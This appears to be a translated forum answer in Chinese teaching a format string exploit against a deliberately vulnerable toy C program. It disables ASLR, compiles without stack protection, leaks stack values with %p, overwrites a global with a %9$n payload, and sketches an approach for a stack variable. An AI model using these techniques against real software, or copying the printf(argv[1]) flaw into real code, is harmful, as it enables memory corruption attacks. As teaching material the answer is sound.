首先我推荐你读这本书Hacking: The Art of Exploitation。这很棒。
现在我尝试解释如何利用您的程序。我假设你知道一些关于格式化字符串漏洞的基础知识,所以我不必从头开始。然而,禁用 ASLR 并在没有堆栈保护的情况下编译可执行文件很重要。
# disable ASLR
@> echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# compile without stack protection
@> gcc -g -fno-stack-protector -z execstack fmt.c
我稍微修改了您的程序,因此更容易理解漏洞利用的工作原理:
#include <stdio.h>
int num1 = 0xdead;
int main(int argc, char **argv){
int num2 = 0xbeef;
int *ptr = &num1;
printf(argv[1]);
if (num1 == 0xabc){
printf("Well done");
}
if(num2 == 0xdef)
printf("You are a format string expert");
printf("\n[DEBUG] num1: 0x%x [%p] num2: 0x%x [%p]\n", num1, &num1, num2, &num2);
return 0;
}
我正在使用 64 位 Ubuntu 系统。指针大小为 8 个字节。
漏洞利用
变量 num1
首先我们尝试改变变量num1。的地址num1存储在ptr. ptr是 main 中的一个局部变量,所以它被放入堆栈(类型 int*)。要检查堆栈,我们可以使用%p格式说明符。
@> ./a.out %p.%p.%p.%p.%p.%p.%p.%p.%p
输出:
0x7fffffffdf78.0x7fffffffdf90.(nil).0x7ffff7dd4e80.0x7ffff7dea560.0x7fffffffdf78.0x200400440.0xbeefffffdf70.0x601040
[DEBUG] num1: 0xdead [0x601040] num2: 0xbeef [0x7fffffffde84]
我们可以看到第 9 个元素的值为0x601040。这与我们调试消息中的值相同num1: 0xdead [0x601040]。现在我们知道这0x601040是指向变量 num1 的指针,它位于堆栈上。要更改该值(写入内存),我们可以将%n格式说明符与直接参数访问结合使用%9$n来写入存储在第 9 个堆栈位置中的地址。
要访问Well done消息,我们只需将0xabc值写入 stdout 并用于%n将该数字写入内存:
@> ./a.out `python -c "print('A' * 0xabc)"`%9\$n
我使用 python 来生成该输出。现在程序打印“干得好”。
变量 num2
如果我们仔细查看输出,我们会发现第 8 个元素的值为beef。那是我们的变量num2。我仍然没有弄清楚如何利用,num2但我尝试从理论上解释如何做到这一点。我们想在堆栈上放一个任意的内存地址。该地址应该是指向 num2 ( 0x7fffffffde84) 的地址。之后,我们可以使用%n参数写入该地址。要将地址放在堆栈上,我们可以使用格式字符串。
@> ./a.out `printf "\x08\x07\x06\x05\x04\x03\x02\x01"`
问题是我们必须在堆栈上找到这个格式字符串的位置。
@> ./a.out AAAA`printf "\x08\x07\x06\x05\x04\x03\x02\x01"`BBBB`python -c "print('%p.' * 200)"`
'A's 和 'B's 只是填充,在输出中找到我们的地址也更容易。该漏洞利用看起来类似于 num1 漏洞利用方式:
@> ./a.out ADDRESS`python -c "print('A' * VAL_TO_WRITE)"`PADDING%LOCATION_OF_ADDRESS\$n
问题:在我们的场景中,地址num2是0x7fffffffde84(即0x00007fffffffde84)。该地址无法写入,因为 0x00 是 C 字符串终止符。所以我们不能把地址放在我们的格式字符串中。